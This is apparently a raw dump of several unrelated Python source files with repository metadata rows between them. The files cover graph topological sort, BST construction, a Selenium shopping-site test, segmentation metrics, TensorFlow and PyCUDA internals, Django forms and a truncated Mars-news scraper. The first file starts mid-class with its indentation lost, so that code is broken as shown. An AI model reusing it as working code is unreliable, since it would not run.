return self.id
def get_weight(self, nbr):
return self.connected[nbr]
class Graph:
def __init__(self):
self.vertices_list = {}
self.vertices_num = 0
def add_vertex(self, key): # Add a vertex in the graph
self.vertices_num += 1
new_vertex = Vertex(key)
self.vertices_list[key] = new_vertex
return new_vertex
def get_vertex(self, key): # To return the vertex with the specified key
if key in self.vertices_list:
return self.vertices_list[key]
else:
return None
    def __contains__(self, items):  # Membership test: `key in g`
        return items in self.vertices_list
    def add_edge(self, v1, v2, weight=1):
        if v1 not in self.vertices_list:
            self.add_vertex(v1)
        if v2 not in self.vertices_list:
            self.add_vertex(v2)
        self.vertices_list[v1].add_neighbor(self.vertices_list[v2], weight)
        # Track in-degree on this graph instance rather than the global `g`.
        self.vertices_list[v2].in_degree += 1
def get_vertices(self):
return self.vertices_list.keys()
def __iter__(self):
return iter(self.vertices_list.values())
class Queue:
def __init__(self):
self.items = []
def __contains__(self, item):
return item in self.items
def is_empty(self):
return self.items == []
def enqueue(self, data):
self.items.insert(0, data)
def de_queue(self):
return self.items.pop()
def size(self):
return len(self.items)
def front(self):
return self.items[-1]
def rare(self):
return self.items[0]
def topological(g):
    """Kahn's algorithm: repeatedly emit a vertex whose in-degree is zero."""
    if not isinstance(g, Graph):
        return None
    q = Queue()
    order = []
    # Seed the queue with every vertex that has no incoming edges.
    for key in g.vertices_list:
        if g.get_vertex(key).in_degree == 0:
            q.enqueue(key)
    while not q.is_empty():
        tmp = q.de_queue()
        order.append(g.get_vertex(tmp))
        # Removing tmp lowers each successor's in-degree; enqueue those that hit zero.
        for x in g.get_vertex(tmp).get_connections():
            x.in_degree -= 1
            if x.in_degree == 0:
                q.enqueue(x.get_id())
    if len(order) != g.vertices_num:
        return None  # a cycle remains; no topological order exists
    return order
if __name__ == '__main__':
g = Graph()
for i in range(7):
g.add_vertex(i)
g.add_edge(0, 5)
g.add_edge(0, 1)
g.add_edge(1, 5)
g.add_edge(1, 4)
g.add_edge(2, 3)
g.add_edge(2, 1)
g.add_edge(3, 1)
g.add_edge(3, 4)
g.add_edge(4, 5)
g.add_edge(6, 5)
g.add_edge(6, 4)
    print([v.get_id() for v in topological(g)])
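    # One valid topological order for this DAG: [0, 2, 6, 3, 1, 4, 5]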
|
[
"[email protected]"
] | |
af55e087aa75c1d2e0da2e2878b229a089ea5ed0
|
32ddd90c9f2b2037cb7fd0a338deefcf16e5d17d
|
/python/tree/sorted_array_to_bst.py
|
f060c74878b80931d55e37ccbd04bc5372c588a4
|
[] |
no_license
|
btoll/howto-algorithm
|
2a671779a4abb279e2a55461c8cfd7094770b42a
|
57ed65d97d951e3746f71190fb57813b519a1aa5
|
refs/heads/master
| 2023-02-20T17:17:38.600806 | 2023-02-10T05:16:22 | 2023-02-10T05:16:22 | 182,487,529 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 782 |
py
|
from random import randint  # used by the commented-out random-root variant below
class TreeNode:
def __init__(self, value):
self.value = value
self.left = None
self.right = None
def sorted_array_to_bst(nodes, left, right):
if left > right:
return None
# Choose left middle node as a root.
mid = (left + right) // 2
# # If odd, add 1. Choose right middle node as a root.
# if (left + right) % 2:
# mid += 1
# Choose random middle node as a root.
# if (left + right) % 2:
# mid += randint(0, 1)
root = TreeNode(nodes[mid])
root.left = sorted_array_to_bst(nodes, left, mid - 1)
root.right = sorted_array_to_bst(nodes, mid + 1, right)
return root
nodes = [-10, -3, 0, 5, 9]
root = sorted_array_to_bst(nodes, 0, len(nodes) - 1)
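

# Sanity check (illustrative): an inorder traversal of a BST built from a
# sorted array must reproduce the array.
def inorder(node):
    if node is None:
        return []
    return inorder(node.left) + [node.value] + inorder(node.right)


assert inorder(root) == nodes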
|
[
"[email protected]"
] | |
4e08bf6ece5a6c2a9ade93b244d59c3220a2ce12
|
df3eb06af5151b0a07ebdf3723aedd3a6cd98f5e
|
/day3/dengLuTest.py
|
5e9494a4b3fd28ff603cf84b6c9ee04351872c1a
|
[] |
no_license
|
zhile0624/selenium7th
|
fa4d8e1a2bdeda18c0170de09144fc052ce71d32
|
6731ce2d786625ba0945739ec2c3109b04cd1441
|
refs/heads/master
| 2020-03-21T10:42:38.832843 | 2018-06-24T08:50:46 | 2018-06-24T08:50:46 | 138,466,713 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,375 |
py
|
# Two keywords for running javascript from selenium: return (the return value) and arguments (the parameters)
import time
from selenium import webdriver
from selenium.webdriver import ActionChains
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.select import Select
driver = webdriver.Chrome()
driver.get("http://localhost")
driver.implicitly_wait(20)
# Click the "登录" (login) link
# Finding the login link with javascript:
# document.getElementsByClassName("site-nav-right fr")[0].childNodes[1]
# Finding the login link with selenium:
# driver.find_element_by_link_text("登录")
# Usually locating an element with selenium is easier than with javascript.
# Although selenium itself has no removeAttribute method,
# the login link selenium finds is the same element javascript finds,
# so we can pass the selenium element into the javascript call in place of the javascript locator.
login_link = driver.find_element_by_link_text("登录")
# "arguments" is plural; arguments[0] is the first parameter, i.e. login_link passed after the js string.
# So the line below effectively substitutes driver.find_element_by_link_text("登录") into the javascript,
# turning it into driver.find_element_by_link_text("登录").removeAttribute('target').
# arguments is the parameter array: all parameters passed after the js string.
# In most cases we only need arguments[0], the first parameter after the js.
driver.execute_script("arguments[0].removeAttribute('target')", login_link)
login_link.click()
# Once that works, write the login steps yourself
driver.find_element_by_id("username").send_keys("changcheng")
ActionChains(driver).send_keys(Keys.TAB).send_keys("123654").send_keys(Keys.ENTER).perform()
# Return to the mall home page
driver.find_element_by_link_text("进入商城购物").click()
# Search for iphone
driver.find_element_by_name("keyword").send_keys("iphone")
driver.find_element_by_name("keyword").submit()
# Click the product (same trick again, so no new window opens)
# Use javascript to delete the target attribute of the <a> tag.
# The <img> has no target attribute, so when copying the css we need its parent <a> tag.
# The copied css selector is often long; we can shorten it where appropriate.
# The node we want to locate is the last node of the selector;
# in "parent > child", what precedes ">" is the parent, what follows is the child.
# The first word of each node is the tag name, e.g. a, div, body.
# The part after a dot is the class attribute.
# In :nth-child(2), "nth" means the n-th (4th, 5th, ...) and "child" means child node,
# so :nth-child(2) says the current tag is the second child of its parent.
product_link_css = "div.protect_con > div:nth-child(2) > div.shop_01-imgbox > a"
# Locate the element via the css selector
iphone = driver.find_element_by_css_selector(product_link_css)
# Delete the element's target attribute
driver.execute_script("arguments[0].removeAttribute('target')", iphone)
iphone.click()
# On the product detail page, click "add to cart"
driver.find_element_by_id("joinCarButton").click()
# driver.find_element_by_class_name("shopCar_T_span3").click()
driver.find_element_by_css_selector(".shopCar_T_span3").click()
# Click the checkout button
# Prefix each class with a dot and drop the space in between; two class values then locate one element at once
driver.find_element_by_css_selector(".shopCar_btn_03.fl").click()
# Click "add new address"
driver.find_element_by_css_selector(".add-address").click()
# Enter the recipient information (region selection is covered this afternoon)
driver.find_element_by_name("address[address_name]").send_keys("张三")
driver.find_element_by_name("address[mobile]").send_keys("13123412345")
dropdown1 = driver.find_element_by_id("add-new-area-select")
# A dropdown is a special kind of page element; operating it differs from ordinary elements.
# Selenium provides a dedicated class, Select, for this special element type.
# dropdown1 is an ordinary page element; the line below
# wraps that ordinary element into the special dropdown element.
print(type(dropdown1)) # dropdown1 is of type WebElement
# The WebElement class only has methods like click and send_keys; it has no method to pick a dropdown option.
select1 = Select(dropdown1)
print(type(select1)) # select1 is of type Select
# After wrapping, it is still the same page element, but the Select class adds option-selection methods.
select1.select_by_value("320000") # now we can pick an option by its value
time.sleep(2)
select1.select_by_visible_text("辽宁省") # or pick it by its visible text
# Try it: select 沈阳市 (Shenyang).
# The id is dynamic, so we cannot locate by id,
# and the class is reused, so we cannot locate by class directly either.
# But with find_elements we can first collect every element whose class is add-new-area-select,
# then pick the n-th page element by index,
# much like the javascript approach learned earlier.
dropdown2 = driver.find_elements_by_class_name("add-new-area-select")[1]
Select(dropdown2).select_by_visible_text("沈阳市")
# Pick 铁西区 (Tiexi district) yourself.
# driver.find_elements_by_class_name("add-new-area-select")[2] is equivalent to the line below.
# tag_name usually matches a whole pile of elements,
# so find_element_by_tag_name() is rarely used,
# while find_elements_by_tag_name()[n] is fairly common.
dropdown3 = driver.find_elements_by_tag_name("select")[2]
Select(dropdown3).select_by_visible_text("铁西区")
# Click to save the recipient information
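# Hypothetical sketch: the selector below is a placeholder; inspect the demo
# site and substitute the real save-button locator before enabling it.
# driver.find_element_by_css_selector(".save-address-btn").click()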
|
[
"51Testing"
] |
51Testing
|
71a6bd882187409a56532f89178daad5194be49b
|
b69e8fd894a6f5d865911c4ec0f0d8b92b2aa6ac
|
/torchtools/meters/vision/utils.py
|
bb0ebf46ae421b97d654ea8b785a79ef42f7d147
|
[
"BSD-3-Clause"
] |
permissive
|
Time1ess/torchtools
|
7338d65de87e0665f7ec90b71cfa439c5bd20201
|
1c48591188827f8a7403162728f86229203354c5
|
refs/heads/master
| 2021-01-23T10:29:14.707874 | 2018-04-30T13:51:03 | 2018-04-30T13:51:03 | 102,616,366 | 20 | 3 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,681 |
py
|
#!/usr/bin/env python3
# coding: UTF-8
# Author: David
# Email: [email protected]
# Created: 2017-09-07 21:24
# Last modified: 2017-09-11 14:41
# Filename: utils.py
# Description:
import numpy as np
from PIL import Image
from torchvision import transforms as T
def fast_hist(label_true, label_pred, n_class):
mask = (label_true >= 0) & (label_true < n_class)
hist = np.bincount(
n_class * label_true[mask].astype(int) +
label_pred[mask], minlength=n_class ** 2).reshape(n_class, n_class)
return hist
def label_accuracy_score(label_trues, label_preds, n_class):
"""Returns accuracy score evaluation result.
- overall accuracy
- mean accuracy
- mean IU
- fwavacc
"""
hist = np.zeros((n_class, n_class))
for lt, lp in zip(label_trues, label_preds):
hist += fast_hist(lt.flatten(), lp.flatten(), n_class)
acc = np.diag(hist).sum() / hist.sum()
acc_cls = np.diag(hist) / hist.sum(axis=1)
acc_cls = np.nanmean(acc_cls)
iu = np.diag(hist) / (hist.sum(axis=1) + hist.sum(axis=0) - np.diag(hist))
mean_iu = np.nanmean(iu)
freq = hist.sum(axis=1) / hist.sum()
fwavacc = (freq[freq > 0] * iu[freq > 0]).sum()
return acc, acc_cls, mean_iu, fwavacc
def build_ss_img_tensor(result, palette):
"""
Build a Semantic result image from output with palette.
Parameters:
* result(torch.Tensor): H x W, pixel classification result
* palette(PIL.ImagePalette): Palette
Return:
* img(torch.Tensor): 3 x H x W
"""
img = Image.fromarray(np.uint8(result), mode='P')
img.putpalette(palette)
img = img.convert()
return T.ToTensor()(img)
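

# Illustrative usage: scoring a tiny 2-class segmentation against ground truth.
if __name__ == '__main__':
    gt = np.array([[0, 0], [1, 1]])
    pred = np.array([[0, 1], [1, 1]])
    acc, acc_cls, mean_iu, fwavacc = label_accuracy_score([gt], [pred], n_class=2)
    print(acc)  # 0.75 -- three of the four pixels match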
|
[
"[email protected]"
] | |
82d6814e4d27a3788157089c8a2a263b4363893e
|
afea9757be324c8def68955a12be11d71ce6ad35
|
/willyanealves/stock/forms.py
|
407e6b50c4057c2d0a82a9414ea1c6e7e450cc88
|
[] |
no_license
|
bergpb/willyane-alves
|
c713cac3ec3a68005f3b8145985693d2477ba706
|
8b2b9922ba35bf2043f2345228f03d80dbd01098
|
refs/heads/master
| 2023-02-10T19:57:50.893172 | 2021-01-11T16:17:14 | 2021-01-11T16:17:14 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 150 |
py
|
from django import forms
from .models import Stock
class StockForm(forms.ModelForm):
class Meta:
model = Stock
fields = '__all__'
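
# Note: fields = '__all__' generates one form field per Stock model field;
# a typical view builds the form as StockForm(request.POST or None).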
|
[
"[email protected]"
] | |
f0df8ddacc4971ea3a805b59733696e807131ade
|
d554b1aa8b70fddf81da8988b4aaa43788fede88
|
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4344/codes/1601_820.py
|
db86b249dcf1f032dea7ef1432b9d829cfe91fe5
|
[] |
no_license
|
JosephLevinthal/Research-projects
|
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
|
60d5fd6eb864a5181f4321e7a992812f3c2139f9
|
refs/heads/master
| 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 362 |
py
|
# Instituto de Computacao - UFAM
# Lab 01 - Ex 10
# 20 / 05 / 2016
# Number of R$ 50 notes: valor // 50
VALOR = int(input("Qual o valor do saque? "))
if VALOR > 0 and VALOR % 2 == 0:
    nota50 = VALOR//50
    aux1 = nota50*50
    nota10 = (VALOR - aux1)//10
    aux2 = nota10*10
    nota2 = (VALOR-aux1-aux2)//2
    print(nota50)
    print(nota10)
    print(nota2)
|
[
"[email protected]"
] | |
102768d7be696f42c91dcd129d83ccad74435d56
|
b5a9d42f7ea5e26cd82b3be2b26c324d5da79ba1
|
/tensorflow/python/pywrap_tensorflow.py
|
f216bccfdfe37ae2e5ed7e2535ac4c5360a2fd71
|
[
"Apache-2.0"
] |
permissive
|
uve/tensorflow
|
e48cb29f39ed24ee27e81afd1687960682e1fbef
|
e08079463bf43e5963acc41da1f57e95603f8080
|
refs/heads/master
| 2020-11-29T11:30:40.391232 | 2020-01-11T13:43:10 | 2020-01-11T13:43:10 | 230,088,347 | 0 | 0 |
Apache-2.0
| 2019-12-25T10:49:15 | 2019-12-25T10:49:14 | null |
UTF-8
|
Python
| false | false | 3,257 |
py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""A wrapper for TensorFlow SWIG-generated bindings."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ctypes
import sys
import traceback
from tensorflow.python.platform import self_check
# Perform pre-load sanity checks in order to produce a more actionable error
# than we get from an error during SWIG import.
self_check.preload_check()
# pylint: disable=wildcard-import,g-import-not-at-top,unused-import,line-too-long
try:
# This import is expected to fail if there is an explicit shared object
# dependency (with_framework_lib=true), since we do not need RTLD_GLOBAL.
from tensorflow.python import pywrap_dlopen_global_flags
_use_dlopen_global_flags = True
except ImportError:
_use_dlopen_global_flags = False
# On UNIX-based platforms, pywrap_tensorflow is a SWIG-generated
# python library that dynamically loads _pywrap_tensorflow.so.
_can_set_rtld_local = (hasattr(sys, 'getdlopenflags')
and hasattr(sys, 'setdlopenflags'))
if _can_set_rtld_local:
_default_dlopen_flags = sys.getdlopenflags()
try:
if _use_dlopen_global_flags:
pywrap_dlopen_global_flags.set_dlopen_flags()
elif _can_set_rtld_local:
# Ensure RTLD_LOCAL behavior for platforms where it isn't the default
# (macOS). On Linux RTLD_LOCAL is 0, so this does nothing (and would not
# override an RTLD_GLOBAL in _default_dlopen_flags).
sys.setdlopenflags(_default_dlopen_flags | ctypes.RTLD_LOCAL)
from tensorflow.python.pywrap_tensorflow_internal import *
from tensorflow.python.pywrap_tensorflow_internal import __version__
from tensorflow.python.pywrap_tensorflow_internal import __git_version__
from tensorflow.python.pywrap_tensorflow_internal import __compiler_version__
from tensorflow.python.pywrap_tensorflow_internal import __cxx11_abi_flag__
from tensorflow.python.pywrap_tensorflow_internal import __monolithic_build__
if _use_dlopen_global_flags:
pywrap_dlopen_global_flags.reset_dlopen_flags()
elif _can_set_rtld_local:
sys.setdlopenflags(_default_dlopen_flags)
except ImportError:
msg = """%s\n\nFailed to load the native TensorFlow runtime.\n
See https://www.tensorflow.org/install/errors\n
for some common reasons and solutions. Include the entire stack trace
above this error message when asking for help.""" % traceback.format_exc()
raise ImportError(msg)
# pylint: enable=wildcard-import,g-import-not-at-top,unused-import,line-too-long
|
[
"[email protected]"
] | |
d8ff438375b4bdd79ecfba103c5f65afd2bcb714
|
47c4267477aac784a83ac241465263585637781d
|
/fb高频/211.py
|
61dac80b450b518b05bf788a7dc59022fbacf1a3
|
[] |
no_license
|
MengSunS/daily-leetcode
|
af011a66213fabcec792c0f8280a03aa805a56ec
|
22c76118bb46fadd2b137fd1a3d40e20fd7538e5
|
refs/heads/main
| 2023-08-21T21:35:19.250506 | 2021-10-12T00:23:09 | 2021-10-12T00:23:09 | 306,220,531 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,207 |
py
|
import collections


class TrieNode():
def __init__(self):
self.children = collections.defaultdict(TrieNode)
self.isWord = False
class WordDictionary:
def __init__(self):
"""
Initialize your data structure here.
"""
self.root = TrieNode()
def addWord(self, word: str) -> None:
node = self.root
for ch in word:
node = node.children[ch]
node.isWord = True
def search(self, word: str) -> bool:
node = self.root
return self.dfs(node, 0, word)
def dfs(self, node, i, word):
if i == len(word):
if node.isWord:
return True
return False
if word[i] == '.':
for n in node.children.values():
if self.dfs(n, i + 1, word):
return True
else:
node = node.children.get(word[i])
if not node:
return False
            return self.dfs(node, i + 1, word)
        # No child matched the '.' wildcard: report False rather than None.
        return False
# Your WordDictionary object will be instantiated and called as such:
# obj = WordDictionary()
# obj.addWord(word)
# param_2 = obj.search(word)
|
[
"[email protected]"
] | |
5bc81745f1d0aa833f2ad310a6858f6d862fc629
|
a1711d3ba173bcf39a1c6ea4aa91013501c090c3
|
/0x0B-python-input_output/10-class_to_json.py
|
974b65033cac85098a58c40e61f1c1fb93ac7c38
|
[] |
no_license
|
veeteeran/holbertonschool-higher_level_programming
|
5115a28c5f9979a146b5c0ed6d9a9d64420dcf4b
|
081705945b8a8850bd3b1c416c382637fae79646
|
refs/heads/master
| 2022-12-14T18:25:54.239460 | 2020-09-25T01:09:05 | 2020-09-25T01:09:05 | 259,425,025 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 335 |
py
|
#!/usr/bin/python3
"""Docstring for class_to_json"""
def class_to_json(obj):
"""
Returns the dictionary description with simple data structure
(list, dictionary, string, integer and boolean) for JSON
serialization of an object
Parameter:
obj: instance of a Class
"""
return obj.__dict__
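
# Illustrative usage: a simple instance serializes directly with json.
if __name__ == "__main__":
    import json

    class Student:
        def __init__(self, name, grades):
            self.name = name
            self.grades = grades

    print(json.dumps(class_to_json(Student("John", [90, 85]))))
    # -> {"name": "John", "grades": [90, 85]}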
|
[
"[email protected]"
] | |
d4a2405378c3de1290dcd43aef5f65c68b279f6b
|
386a5b505d77c9798aaab78495d0f00c349cf660
|
/Prognos Project/Working/Piyush Jiwane Git/Project/SearchPortal/questionnaireApp/urls.py
|
a954ca7fb967835830274b6c83975983ed14e83b
|
[] |
no_license
|
namratarane20/MachineLearning
|
2da2c87217618d124fd53f607c20641ba44fb0b7
|
b561cc74733b655507242cbbf13ea09a2416b9e2
|
refs/heads/master
| 2023-01-20T18:54:15.662179 | 2020-03-09T14:12:44 | 2020-03-09T14:12:44 | 237,597,461 | 0 | 0 | null | 2023-01-05T12:37:12 | 2020-02-01T10:22:20 |
Python
|
UTF-8
|
Python
| false | false | 1,173 |
py
|
from django.urls import path,re_path
from . import views
#
# urlpatterns = [
# path('', views.userLogin),
# path('mailVerification', views.mailVerification),
# path('searchKeyword', views.searchKeyword),
# path('uploadcsv', views.uploadcsv),
# path('homepage', views.toHomePage),
# path('indexfile', views.indexToElasticsearch)
# ]
urlpatterns = [
path('', views.Home),
path('searchKeyword', views.searchKeyword ,name="searchKeyword"),
path('searchKeyword/<str:recentSearch>', views.recentSearchKeyword, name="recentSearchKeyword"),
path('account/logout/', views.Logout),
path('adminLogin', views.adminLogin),
path('adminMailVerification', views.adminMailVerification),
path('indexQuestionnaireFile', views.indexQuestionnaireFile),
path('indexPoliciesFile', views.indexPoliciesFile),
path('toHomePage', views.toHomePage),
path('addToTags',views.addToTags),
# path('dispalyTagName',views.dispalyTagName),
path('destroyTag', views.destroyTagInformation),
    # URL patterns should not begin with a slash.
    path("<str:tagname>", views.displayTagInformation, name='displayTagInfo'),
    path('displayTagInformation', views.displayTagInformation),
]
|
[
"[email protected]"
] | |
66bd1d94ba94629eca7202be8c0653b0e0efebbb
|
f1cb404ea95f4527ffeaf6a7fe8db9a2a1990f12
|
/scikits/cuda/special.py
|
4a1081fee13facf5d7818ebdbded9cd221c4cb7f
|
[
"BSD-3-Clause"
] |
permissive
|
sequoiar/scikits.cuda
|
c0821502b7dc90d818669e20f2fa1858f1a78e82
|
79b62904a726d45066351c38b4274b1ecc985e47
|
refs/heads/master
| 2020-12-25T07:39:47.594383 | 2011-03-30T14:39:20 | 2011-03-30T14:39:20 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,139 |
py
|
#!/usr/bin/env python
"""
PyCUDA-based special functions.
"""
import os
from string import Template
import pycuda.gpuarray as gpuarray
from pycuda.compiler import SourceModule
import numpy as np
from misc import get_dev_attrs, select_block_grid_sizes, init, get_current_device
# Get installation location of C headers:
from . import install_headers
# Adapted from Cephes library:
sici_mod_template = Template("""
#include "cuSpecialFuncs.h"
#if ${use_double}
#define FLOAT double
#define SICI(x, si, ci) sici(x, si, ci)
#else
#define FLOAT float
#define SICI(x, si, ci) sicif(x, si, ci)
#endif
__global__ void sici_array(FLOAT *x, FLOAT *si,
FLOAT *ci, unsigned int N) {
unsigned int idx = blockIdx.y*blockDim.x*gridDim.x+
blockIdx.x*blockDim.x+threadIdx.x;
FLOAT si_temp, ci_temp;
if (idx < N) {
SICI(x[idx], &si_temp, &ci_temp);
si[idx] = si_temp;
ci[idx] = ci_temp;
}
}
""")
def sici(x_gpu):
"""
Sine/Cosine integral.
Computes the sine and cosine integral of every element in the
input matrix.
Parameters
----------
x_gpu : GPUArray
Input matrix of shape `(m, n)`.
Returns
-------
(si_gpu, ci_gpu) : tuple of GPUArrays
Tuple of GPUarrays containing the sine integrals and cosine
integrals of the entries of `x_gpu`.
Examples
--------
>>> import pycuda.gpuarray as gpuarray
>>> import pycuda.autoinit
>>> import numpy as np
>>> import scipy.special
>>> import special
>>> x = np.array([[1, 2], [3, 4]], np.float32)
>>> x_gpu = gpuarray.to_gpu(x)
    >>> (si_gpu, ci_gpu) = sici(x_gpu)
>>> (si, ci) = scipy.special.sici(x)
>>> np.allclose(si, si_gpu.get())
True
>>> np.allclose(ci, ci_gpu.get())
True
"""
if x_gpu.dtype == np.float32:
use_double = 0
elif x_gpu.dtype == np.float64:
use_double = 1
else:
raise ValueError('unsupported type')
# Get block/grid sizes:
dev = get_current_device()
block_dim, grid_dim = select_block_grid_sizes(dev, x_gpu.shape)
# Set this to False when debugging to make sure the compiled kernel is
# not cached:
cache_dir=None
sici_mod = \
SourceModule(sici_mod_template.substitute(use_double=use_double),
cache_dir=cache_dir,
options=["-I", install_headers])
sici_func = sici_mod.get_function("sici_array")
si_gpu = gpuarray.empty_like(x_gpu)
ci_gpu = gpuarray.empty_like(x_gpu)
sici_func(x_gpu, si_gpu, ci_gpu,
np.uint32(x_gpu.size),
block=block_dim,
grid=grid_dim)
return (si_gpu, ci_gpu)
# Adapted from specfun.f in scipy:
e1z_mod_template = Template("""
#include <pycuda/pycuda-complex.hpp>
#define PI 3.1415926535897931
#define EL 0.5772156649015328
#if ${use_double}
#define FLOAT double
#define COMPLEX pycuda::complex<double>
#else
#define FLOAT float
#define COMPLEX pycuda::complex<float>
#endif
__device__ COMPLEX _e1z(COMPLEX z) {
FLOAT x = real(z);
FLOAT a0 = abs(z);
COMPLEX ce1, cr, ct0, kc, ct;
if (a0 == 0.0)
ce1 = COMPLEX(1.0e300, 0.0);
else if ((a0 < 10.0) || (x < 0.0 && a0 < 20.0)) {
ce1 = COMPLEX(1.0, 0.0);
cr = COMPLEX(1.0, 0.0);
for (int k = 1; k <= 150; k++) {
cr = -(cr * FLOAT(k) * z)/COMPLEX((k + 1.0) * (k + 1.0), 0.0);
ce1 = ce1 + cr;
if (abs(cr) <= abs(ce1)*1.0e-15)
break;
}
ce1 = COMPLEX(-EL,0.0)-log(z)+(z*ce1);
} else {
ct0 = COMPLEX(0.0, 0.0);
for (int k = 120; k >= 1; k--) {
kc = COMPLEX(k, 0.0);
ct0 = kc/(COMPLEX(1.0,0.0)+(kc/(z+ct0)));
}
ct = COMPLEX(1.0, 0.0)/(z+ct0);
ce1 = exp(-z)*ct;
if (x <= 0.0 && imag(z) == 0.0)
ce1 = ce1-COMPLEX(0.0, -PI);
}
return ce1;
}
__global__ void e1z(COMPLEX *z, COMPLEX *e,
unsigned int N) {
unsigned int idx = blockIdx.y*blockDim.x*gridDim.x+
blockIdx.x*blockDim.x+threadIdx.x;
if (idx < N)
e[idx] = _e1z(z[idx]);
}
""")
def e1z(z_gpu):
"""
Exponential integral with `n = 1` of complex arguments.
Parameters
----------
    z_gpu : GPUArray
Input matrix of shape `(m, n)`.
Returns
-------
e_gpu : GPUArray
        GPUArray containing the exponential integrals of
the entries of `z_gpu`.
Examples
--------
>>> import pycuda.gpuarray as gpuarray
>>> import pycuda.autoinit
>>> import numpy as np
>>> import scipy.special
>>> import special
>>> z = np.asarray(np.random.rand(4, 4)+1j*np.random.rand(4, 4), np.complex64)
>>> z_gpu = gpuarray.to_gpu(z)
    >>> e_gpu = e1z(z_gpu)
>>> e_sp = scipy.special.exp1(z)
>>> np.allclose(e_sp, e_gpu.get())
True
"""
if z_gpu.dtype == np.complex64:
use_double = 0
elif z_gpu.dtype == np.complex128:
use_double = 1
else:
raise ValueError('unsupported type')
# Get block/grid sizes; the number of threads per block is limited
# to 256 because the e1z kernel defined above uses too many
# registers to be invoked more threads per block:
dev = get_current_device()
max_threads_per_block = 256
block_dim, grid_dim = select_block_grid_sizes(dev, z_gpu.shape, max_threads_per_block)
# Set this to False when debugging to make sure the compiled kernel is
# not cached:
cache_dir=None
e1z_mod = \
SourceModule(e1z_mod_template.substitute(use_double=use_double),
cache_dir=cache_dir)
e1z_func = e1z_mod.get_function("e1z")
e_gpu = gpuarray.empty_like(z_gpu)
e1z_func(z_gpu, e_gpu,
np.uint32(z_gpu.size),
block=block_dim,
grid=grid_dim)
return e_gpu
if __name__ == "__main__":
import doctest
doctest.testmod()
|
[
"[email protected]"
] | |
9985402449b77dd2fda3edef41399a64fc307d8c
|
146819090fefeaddeadad8d4659919868e893537
|
/cvproject/Lib/site-packages/djmoney/forms/widgets.py
|
c16a5515a4cb635ad1f087126052151d8ddb48fb
|
[
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-python-cwi",
"GPL-1.0-or-later",
"LicenseRef-scancode-newlib-historical",
"OpenSSL",
"bzip2-1.0.6",
"Python-2.0",
"TCL",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-other-copyleft"
] |
permissive
|
MdReyajuddin/Big-Project-Codes
|
d5ec071bc5efc65ebdd07e757139a8ee67359706
|
79ab22f2f51e29e2ff17f680306877559c719a56
|
refs/heads/master
| 2022-12-01T04:17:39.138523 | 2020-03-17T18:51:40 | 2020-03-17T18:51:40 | 248,046,679 | 0 | 0 |
BSD-3-Clause
| 2022-11-22T04:40:11 | 2020-03-17T18:40:05 |
Python
|
UTF-8
|
Python
| false | false | 874 |
py
|
# -*- coding: utf-8 -*-
from django.forms import MultiWidget, Select, TextInput
from ..settings import CURRENCY_CHOICES
__all__ = ("MoneyWidget",)
class MoneyWidget(MultiWidget):
def __init__(
self,
choices=CURRENCY_CHOICES,
amount_widget=TextInput,
currency_widget=None,
default_currency=None,
*args,
**kwargs
):
self.default_currency = default_currency
if not currency_widget:
currency_widget = Select(choices=choices)
widgets = (amount_widget, currency_widget)
super(MoneyWidget, self).__init__(widgets, *args, **kwargs)
def decompress(self, value):
if value is not None:
if isinstance(value, (list, tuple)):
return value
return [value.amount, value.currency]
return [None, self.default_currency]
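        # Note: for a Money value this returns [amount, currency], one entry
        # per sub-widget; None falls back to the configured default currency.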
|
[
"[email protected]"
] | |
0764bdbf763f0bf71ecedac5f306b8263fc7c589
|
c08b5edb5075e7840e716b0a09006dae0a4d05ac
|
/.history/Missions_to_Mars/scrape_mars_20200812110529.py
|
dad4048c45ed15c13a2ed258346030ab05ae1724
|
[] |
no_license
|
OlgaDlzk/web-scraping-challenge-1
|
06f915eb76c55c9bc37889017dd9af81122dc1a5
|
f99c3436dfb0169595c46dae7733d90e21385cc6
|
refs/heads/master
| 2023-03-18T00:58:37.928024 | 2020-09-22T20:32:47 | 2020-09-22T20:32:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,710 |
py
|
from splinter import Browser
from bs4 import BeautifulSoup as bs
import pandas as pd
import time
import re
# This is for debugging
def savetofile(contents):
file = open('_temporary.txt',"w",encoding="utf-8")
file.write(contents)
file.close()
def scrape():
executable_path = {"executable_path": "chromedriver"}
browser = Browser("chrome", **executable_path, headless=False)
# NASA Mars News
url = 'https://mars.nasa.gov/news/'
browser.visit(url)
time.sleep(3)
html = browser.html
soup = bs(html, 'html.parser')
slides = soup.find_all('li', class_='slide')
content_title = slides[0].find('div', class_='content_title')
news_title = content_title.text.strip()
article_teaser_body = slides[0].find('div', class_='article_teaser_body')
news_p = article_teaser_body.text.strip()
# JPL Mars Space Images
base_url = 'https://www.jpl.nasa.gov'
url = base_url + '/spaceimages/?search=&category=Mars'
browser.visit(url)
time.sleep(1)
html = browser.html
soup = bs(html, 'html.parser')
featured_image_url = base_url + soup.find('a',class_='button fancybox')['data-fancybox-href']
# Mars Weather
mars_weather = []
url = 'https://twitter.com/marswxreport?lang=en'
browser.visit(url)
time.sleep(3)
